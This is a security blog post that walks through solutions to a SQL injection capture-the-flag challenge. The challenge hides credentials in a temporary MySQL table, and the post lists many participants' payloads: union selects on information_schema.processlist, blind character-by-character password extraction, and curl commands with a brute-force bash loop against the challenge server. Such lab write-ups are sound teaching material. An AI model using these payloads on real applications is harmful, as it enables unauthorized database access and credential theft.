Skip to main content
Websec Logo
Blog August 22, 2012

Solutions for challenge 2B

A detailed explanation of the SQL Injection challenge 2B and the many solutions used to solve this challenge.

Share this article:

After posting the solutions for challenge 2A from the series of SQL Injection challenges, it only made sense to continue with 2B; considering that 'B' is a slighty more difficult variation of 'A'. Challenge 2B is probably my favorite challenge because of its simplicity, yet how confusing it was for many participants.

 

Explanation

DISCLAIMER: If you haven't tried this challenge, it is still available here (no longer available online) in case you want to give it a shot before reading the SOLUTIONS below.

This challenge, similar to 2A, allows you to log in as guest and creates the cookie user_id which is vulnerable to SQL Injection. Initially no filtering was used since the idea behind the challenge was to figure out different ways of retrieving the table/column name. What is tricky about this challenge is that it uses a temporary table to store the credentials and the temp table only exists during the PHP script's execution. The thing about temporary tables is that they do not appear in information_schema.tables/columns, so this was the perfect way of making participants figure out other methods for obtaining the table/column names.

The intended solution is to use information_schema.proccesslist, which is available starting from MySQL 5.1. Injecting union select info from information_schema.processlist will return the whole query being used which can be extremely useful when table_name/column_name are being blocked by a WAF/IDS.

Example

-1 union select info from information_schema.processlist

SELECT websec_rocks_temp_username, websec_rocks_temp_user_priv FROM websec_rocks_temp_uzuAr1Os WHERE websec_rocks_temp_user_id = -1 union select info from information_schema.processlist

Challenge Modifications

After w00d's and Miroslav's solutions, I made 2 slight adjustments to the challenge, so that it would be solved as intended. W00d's solution used PROCEDURE ANALYSE(), so I decided to block the word 'PROCEDURE', since this method is already documented on The SQL Injection KB; w00d later submitted a solution using the intended method. As for Miroslav, he was able to find the column name through a dictionary attack using the txt/common-columns.txt file from sqlmap. The second modification was to change the column names so they could no longer be guessed.

 

Solutions

NULL Life CTF TEAM:

user_id= 3 union select 1,2,concat_ws(0x3a,command,time,state,info),4 from information_schema.processlist limit 1-- -

Raz0r:

user_id=-1+union+select+1,2,INFO,4+FROM+information_schema.PROCESSLIST+LIMIT+1--+-

user_id=0+and+IF(ORD(MID(temp_password,0,1))+BETWEEN+0+AND+255,1,(select+1+union+select+2))--+-

w00d:

curl -i http://50.57.51.240/challenges/2B/challenge.php --cookie "user_id=0 limit 3,1 PROCEDURE ANALYSE()"

curl -i http://50.57.51.240/challenges/2B/challenge.php --cookie "user_id=-1 union select group_concat(info),2 from information_schema.processlist"

Miroslav Stampar:

1 OR LENGTH()>0 LIMIT 0,1

user_id=0 AND ORD(MID(temp_password,17,1))>1 LIMIT 0,1

g4mm4:

user_id=-1 union select info,'padding' from information_schema.processlist#

Dominus:

user_id=0+and+1=0+union+select+1,unhex(hex(concat_ws(0x3a,info,state)))+from information_schema.processlist limit 0,1

user_id=0 and websec_rocks_temp_password like 'a%'

mortis:

Used processlist

user_id=0 and websec_rocks_temp_password like '%'

Karion:

Used processlist

for i in {4,5,6,7} ; do for j in {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} ; do curl http://50.57.51.240/challenges/2B/challenge.php -b "user_id=-9 or websec_rocks_temp_password LIKE 0x454c5f4d55595f56455247${i}${j}25" 2>&1 | grep ADMIN ; echo $i$j ;done; done

BlackFan:

user_id=-1 union select info,2 from information_schema.processlist limit 1;

user_id=0 and (@:=websec_rocks_temp_password) union select @,1;

gijs:

user_id=5 UNION select 1,(select info from information_schema.processlist LIMIT 1)

Same script from challenge 2A.

MisterJyu:

Used processlist

if(mid(binary(websec_rocks_temp_password),1,1)='a',0,1)

Submitted a Python script found here.

Nurfed:

user_id=-1 union select 1,info from information_schema.PROCESSLIST limit 0,1#

user_id=0 and LENGTH(websec_rocks_temp_password)=16#

user_id=0 and websec_rocks_temp_password like 0x25656c5f6d75795f76657267756974617325#

 

A full list of the victors for each challenge is available here.

 

Tags

# 2B # Challenge # Injection # SQL # Solution

Subscribe to our Newsletter

Get the latest cybersecurity insights and updates delivered to your inbox.

Subscribe Now RSS Feed

Related Articles

Discover more cybersecurity insights and solutions to help strengthen your organization's security posture

Image unavailable
Blog October 3, 2023

A Comparison Between the Real User ID and the Effective User ID is not Enough to Prevent Privilege Escalation

In Unix-like systems, processes have a real and effective user ID determining their access permissions. While usually identical, they can differ in situations like when the setuid bit is activated in executables.

Read full article
Image unavailable
Blog May 19, 2022

CVE-2022-21404: Another story of developers fixing vulnerabilities unknowingly because of CodeQL

How CodeQL may help reduce false negatives within Open-Source projects. Taking a look into a deserialization vulnerability within Oracle Helidon (CVE-2022-21404).

Read full article
Image unavailable
Blog September 2, 2021

Cybersecurity in Web Applications - Where to start? Where to improve? Where to learn more?

A list of resources for web application security and a short description of what each resource covers.

Read full article
View All Blog Posts